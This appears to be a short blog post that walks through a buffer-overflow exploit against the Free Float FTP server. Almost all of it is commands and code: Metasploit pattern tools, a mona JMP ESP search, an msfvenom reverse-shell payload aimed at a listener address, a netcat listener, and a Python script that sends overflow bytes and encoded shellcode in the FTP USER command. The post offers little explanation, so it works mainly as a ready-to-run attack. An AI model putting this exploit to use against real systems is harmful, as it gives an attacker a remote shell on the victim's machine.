Header Ads

Header ADS

Exploiting Free Float FTP ftp server

Commands:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 10000
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <value of Eip>
!mona jmp -r esp
msfvenom -a x86 -platform Windows -p windows/shell_reverse_tcp LHOST=192.168.85.141 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d'  -f python
nc -nlvp 4444









badchars = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")








sbuff = "A"*247  + '\xED\x1E\x94\x7C'+ '\x90'*20 + buff + 'C'*(1000-247-4-20-351) 







import socket,sys target = sys.argv[1] # EIP control after 230 bytes in buffer # '\xED\x1E\x94\x7C' - JMP ESP | XP SP3 EN [NTDLL.dll] (C:WINDOWSsystem32SHELL32.dll) #buff = 'x90'*230+'xd7x30x9dx7c'+'x43'*366 #buff='Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B'

buf = "" buf += "\xbe\x26\xeb\x66\xe6\xdd\xc0\xd9\x74\x24\xf4\x5d\x33" buf += "\xc9\xb1\x52\x31\x75\x12\x03\x75\x12\x83\xe3\xef\x84" buf += "\x13\x17\x07\xca\xdc\xe7\xd8\xab\x55\x02\xe9\xeb\x02" buf += "\x47\x5a\xdc\x41\x05\x57\x97\x04\xbd\xec\xd5\x80\xb2" buf += "\x45\x53\xf7\xfd\x56\xc8\xcb\x9c\xd4\x13\x18\x7e\xe4" buf += "\xdb\x6d\x7f\x21\x01\x9f\x2d\xfa\x4d\x32\xc1\x8f\x18" buf += "\x8f\x6a\xc3\x8d\x97\x8f\x94\xac\xb6\x1e\xae\xf6\x18" buf += "\xa1\x63\x83\x10\xb9\x60\xae\xeb\x32\x52\x44\xea\x92" buf += "\xaa\xa5\x41\xdb\x02\x54\x9b\x1c\xa4\x87\xee\x54\xd6" buf += "\x3a\xe9\xa3\xa4\xe0\x7c\x37\x0e\x62\x26\x93\xae\xa7" buf += "\xb1\x50\xbc\x0c\xb5\x3e\xa1\x93\x1a\x35\xdd\x18\x9d" buf += "\x99\x57\x5a\xba\x3d\x33\x38\xa3\x64\x99\xef\xdc\x76" buf += "\x42\x4f\x79\xfd\x6f\x84\xf0\x5c\xf8\x69\x39\x5e\xf8" buf += "\xe5\x4a\x2d\xca\xaa\xe0\xb9\x66\x22\x2f\x3e\x88\x19" buf += "\x97\xd0\x77\xa2\xe8\xf9\xb3\xf6\xb8\x91\x12\x77\x53" buf += "\x61\x9a\xa2\xf4\x31\x34\x1d\xb5\xe1\xf4\xcd\x5d\xeb" buf += "\xfa\x32\x7d\x14\xd1\x5a\x14\xef\xb2\xa4\x41\xba\xcf" buf += "\x4d\x90\x44\xc1\xd1\x1d\xa2\x8b\xf9\x4b\x7d\x24\x63" buf += "\xd6\xf5\xd5\x6c\xcc\x70\xd5\xe7\xe3\x85\x98\x0f\x89" buf += "\x95\x4d\xe0\xc4\xc7\xd8\xff\xf2\x6f\x86\x92\x98\x6f" buf += "\xc1\x8e\x36\x38\x86\x61\x4f\xac\x3a\xdb\xf9\xd2\xc6" buf += "\xbd\xc2\x56\x1d\x7e\xcc\x57\xd0\x3a\xea\x47\x2c\xc2" buf += "\xb6\x33\xe0\x95\x60\xed\x46\x4c\xc3\x47\x11\x23\x8d" buf += "\x0f\xe4\x0f\x0e\x49\xe9\x45\xf8\xb5\x58\x30\xbd\xca" buf += "\x55\xd4\x49\xb3\x8b\x44\xb5\x6e\x08\x74\xfc\x32\x39" buf += "\x1d\x59\xa7\x7b\x40\x5a\x12\xbf\x7d\xd9\x96\x40\x7a" buf += "\xc1\xd3\x45\xc6\x45\x08\x34\x57\x20\x2e\xeb\x58\x61" buff=buf #buff = "A"*247 + '\xED\x1E\x94\x7C' +'\x90'*300 + 'C'*40 sbuff = "A"*247 + '\xED\x1E\x94\x7C'+ '\x90'*20 + buff + 'C'*(1000-247-4-20-351) s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((target,21)) s.send("USER"+sbuff+"\r\n") print s.recv(2048) s.close()

No comments

Powered by Blogger.